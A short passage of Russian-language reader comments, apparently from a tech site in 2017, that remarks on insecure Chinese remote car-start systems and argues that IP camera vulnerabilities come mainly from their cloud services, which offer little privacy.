    Просто для примера: в автосалоне лежит выводок китайских систем удаленного запуска двигателя с SIM-картой и приложением? для Android… ага, всё понятно.

    И так везде:(


  1. boojum
    15.03.2017 12:48

    Я так понял, что практичеси все уязвимости связаны не собственно с камерами, а с их «облачными» сервисами.
    Но ведь в случае их использования априори глупо ждать какой-либо конфиденциальности. Если сам указываешь устройству сливать данные в сеть, то по меньшей мере наивно думать, что ни у кого кроме тебя не будет там к ним доступа.